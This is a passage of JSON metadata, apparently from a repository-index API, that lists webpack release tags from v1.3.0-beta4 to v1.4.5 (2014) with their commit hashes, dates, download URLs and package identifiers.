:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/